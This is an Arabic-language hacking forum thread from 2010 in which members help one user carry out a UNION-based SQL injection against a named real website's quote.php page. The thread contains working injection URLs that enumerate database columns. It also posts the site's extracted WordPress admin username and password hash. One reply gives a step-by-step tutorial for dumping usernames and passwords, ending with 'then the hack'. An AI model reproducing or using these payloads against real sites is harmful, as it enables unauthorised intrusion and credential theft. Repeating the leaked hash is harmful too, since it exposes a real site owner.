التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
تحديث الصفحة مساعده من محترفى SQL
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-12-2010, 08:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 
 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road
افتراضي غير مجاب: مساعده من محترفى SQL

السلام عليكم
يا ناس انا جيت لحد الخطوه دى وعطلت

كود PHP:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29 
المفروض من وجهه نظرى الخطوه اللى بعديها

كود PHP:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138 
بس للاسف الباسورد لم يظهر
:a43::a43::a43:
العمود المصاب 4

5.0.67.d7-ourdelta-log :اصدار القاعده version


james138 :اسم القاعده database

ارجو المساعده

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lshu]i lk lpjvtn SQL

   

رد مع اقتباس
قديم 02-12-2010, 10:48 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 
 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road
افتراضي

السلام عليكم أخويا هدا هو الاستغلال الصحيح
اسم الجدول
wp_users

وهده هي البيانات
user_login=admin
user_pass=$P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF/

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 10:49 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 
 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road
افتراضي

هدا الاستغلال هو رابط الاستغلال
http://qcsgopc.org/quote.php?ID=-13+...+from+wp_users

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 10:50 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 
 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road
افتراضي

تقبل مروري
ســلامــــــــــات

التوقيع

 

   

رد مع اقتباس
قديم 02-12-2010, 11:21 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 
 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road
افتراضي

الف الف الف الف الف شكر اخى X-Sn4k3
بس معلش توضيح
ده الباس $P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF مشفر md5
وده اليوزر admin

   

رد مع اقتباس
قديم 02-13-2010, 12:06 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية X-Sn4k3
 

 
 
إحصائية العضو







X-Sn4k3 غير متواجد حالياً

إرسال رسالة عبر MSN إلى X-Sn4k3

 

 

إحصائية الترشيح

عدد النقاط : 10
X-Sn4k3 is on a distinguished road
افتراضي

hatmoot
طبعأأ أخويا
هدا الباس $P$BhlMDlSbrPUVKfkJkM3dkEnFPEoALF
بس مش من نوع Md5
هدا نوع أخر وصعيب جداا
واليوزر هو admin
موفقــ

التوقيع

 

   

رد مع اقتباس
قديم 02-13-2010, 12:16 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 
 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road
Smile

السلام عليكم


اخي اولا ./

كود:
http://qcsgopc.org/quote.php?ID=13+union+select+1,2,3,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,5+from+information_schema.columns+where+column_name%20+like+char%2837,%20112,%2097,%20115,%20115,%2037%29
الى هنا الحقنــة صحيحــة..


ثانيــا يا اخي ..

كود:
http://qcsgopc.org/quote.php?ID=-13+union+select+1,2,3,wp_posts,5+from+james138
هذا غلــــط ككككككككككككككككككككككككككككككككككككككبير

شوف اخي عندما استخرجت اعمدة الباسورد وهي ..


wp_posts:post_password:james138


wp_users:user_pass:james138


طبعـــا انت استخرجتها بالحنقه الاولى وهي هذه .

اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

طيب لما ظهرت لك الاعمدة او الجداول هذي .



wp_posts:post_password:james138


wp_users:user_pass:james138


اذهــب فــوررأأأ الى هذا المـــوقــع .. وهو موقع التشفير ..


http://waraxe.us/sql-char-encoder.html


طيب الحين ياغالي تاخذ [ اســم الجدول ] ..

وهذا هو wp_posts او wp_users


اختر واحد فيهم واذهب الى الى موقع التشفير وضعــه في الموقع حتى يتم تشفيره


لكي يستخرج لك عمود اليوزر نيــم ..


وهذه صــورة ياغالي ..







الان عرفنا كيف نشفر .. ^^


طيب انسخ الكلام الي ماشر عليه بالصوره بعد التشفير وضعه بعد الامر هذا ..

where+table_name=#


مثال .:


+where+table_name=0x77705f706f737473


الان انسخ الامر كامل ..مع الكلام الي شفرناهـ ..


واذهب الى الحقنـه هذه ..


اقتباس
http://qcsgopc.org/quote.php?ID=13+u...20115,%2037%29

وامــســح هذا الامر تبع الباسورد


where+column_name +like+char(37, 112, 97, 115, 115, 37)

وضــع هذا الامر ..


+where+table_name=0x77705f706f737473


ولا تنسى ان تضع هذا [ -- ] او iهذا [ /* ] اذا كان الموقع لايقبل ..


وبعد ماتفعل سوف يظهر لك اسم اليوزر ..

وهو post_name

لما يظهر اذهب وضع اسم اليوز في العمود المصاب وسوف يظهر لك اسم صاحب الموقع


او اذا اردت ان يظهر لك الباسورد واليوز مع بعض


اكتب هذا الامر في العمود المصاب ..

Concat(user,0x3a,pass)


ضـع مكان user اسسم اليوزر نيم تبع االموقع الي انت طلعتــه

وضع مكان pass اسم عمود الباسورد الي انت طلعتــه وهو post_password او user_pass



وفي نهايت الرابط ضــع هذا الاسسم


james138
وهو ياتي دايمــا اخر كلمــه


wp_posts:post_password:james138


ثم اضغط انتر وسوف يظهر لك اليوز والباسورد ..


ومن ثم الاختراق ..



أرجــو إنــك فـهــمت شرحــي وانا انصــحك تتابع هذا الفهرس تبع الاخ [ فلكانو جزاه الله خيرأأ ]

وهو فهرس لإختراق المواقع بثغرات SQL وبإذن الله سوف تصبح محترف ياغالي

وهذا رابط الفهرس هنا بالمنتدى ..

http://www.vbspiders.com/vb/t22432.html


تحياتي لك اخــي الغالي

:00001793[1]:وأختراقات موفقــه بإذن الله .. :00001793[1]:
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-13-2010, 12:18 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 
 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road
افتراضي

اسف ياغالي على التاخير بالرد بس كنت اسويلك شرح هههههههههههههههههههههه

بالتوفيق

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-13-2010, 04:09 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية hatmoot
 

 
 
إحصائية العضو





hatmoot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hatmoot is on a distinguished road
افتراضي

والله مش عارف اشكركم ازاى
ربنااااااااااااااااااااااااااااااااا يصلح حالكم
شكررررررا اوى اخواتى
X-Sn4k3وDr.NaNo

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
طلب الى محترفي نادي vbspiders wayne جـــ'ابات العناكــ'ب 9 02-28-2018 07:58 AM
طلب من محترفى الحقن sasa22 جـــ'ابات العناكــ'ب 0 10-30-2010 06:26 PM


الساعة الآن 07:02 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0